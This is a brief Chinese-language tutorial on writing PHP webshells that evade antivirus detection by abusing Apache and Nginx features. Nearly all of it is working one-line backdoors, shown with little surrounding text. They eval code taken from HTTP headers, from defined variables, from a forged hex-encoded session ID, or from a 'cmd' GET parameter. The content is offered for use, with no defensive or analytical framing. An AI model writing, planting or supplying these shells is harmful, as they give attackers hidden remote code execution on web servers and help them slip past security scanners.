PHP利用Apache、Nginx的特性实现免杀Webshell
| 环境 | 函数 | 用法 |
|---|---|---|
| nginx | get_defined_vars() |
返回由所有已定义变量所组成的数组 |
| apache | getallheaders() |
获取全部 HTTP 请求头信息 |
apache环境
|
1
2
3
|
<?php
eval(next(getallheaders()));
?>
|
apache和nginx环境通用
|
1
2
3
|
<?php
eval(implode(reset(get_defined_vars())));
?>
|
另外一种通过执行伪造的sessionid值,进行任意代码执行。
|
1
2
3
|
<?php
eval(hex2bin(session_id(session_start())));
?>
|
给webshell加密码
|
1
|
<?php eval(get_defined_vars()['_GET']['cmd']);?>
|
